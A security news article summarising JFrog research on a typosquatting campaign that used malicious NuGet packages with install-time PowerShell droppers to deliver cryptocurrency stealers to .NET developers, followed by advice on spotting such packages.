JFrog security researchers Natan Nehorai and Brian Moussalli have observed an ongoing campaign where threat actors are using typosquatting to impersonate legitimate packages in the NuGet repository, to target and infect .NET developers with cryptocurrency stealers. Within a month, three of these malicious packages have been downloaded over 150,000 times.

“The packages contained a PowerShell script that would execute upon installation and trigger a download of a ‘second stage’ payload, which could be remotely executed,” JFrog researchers Natan Nehorai and Brian Moussalli said.

Malware in vogue

166,000 downloads were attributed solely to three of the most popular packages, namely Coinbase. Core, Anarchy.Wrapper.Net, and DiscordRichPresence.API. However, there is a possibility that the perpetrators artificially inflated the download numbers using bots to make them seem more authentic.

The fact that Coinbase and Discord were utilized highlights the continued dependence on typosquatting techniques, wherein bogus packages are given names that are similar to legitimate ones to deceive developers into downloading them.

First stage: The malware included in these software packages serves as a dropper script that automatically executes a PowerShell code to retrieve a follow-on binary from a server with a hard-coded address.

Second Stage: JFrog characterizes the second-stage malware as a “fully customized executable payload,” which can be swapped dynamically as it is obtained from the C2 server.

“.NET developers using NuGet are still at high risk of malicious code infecting their environments and should take caution when curating open-source components for use in their builds – and at every step of the software development lifecycle – to ensure the software supply chain remains secure.”

Keep an eagle’s eye on malicious NuGet packages

According to JFrog researchers:

• Firstly, developers should be vigilant about misspellings in imported or installed packages. Some malicious packages imitate the names of reputable packages, hoping that developers will mistakenly include them in their projects or list them as a dependency.

• Another approach to avoid installing malicious packages is to inspect them for any suspicious installation or initialization scripts manually. We suggest examining the packages using the NuGet Package Explorer before installing them, which can be accessed via the right pane menu on a package’s page.

Ending note: Be on your guard

With malware all around, it is difficult to prevent digital hitches. The only possible way to stay away from these repositories is safety measures at every step of the software development lifecycle to ensure the software supply chain remains secure.

Leave Comment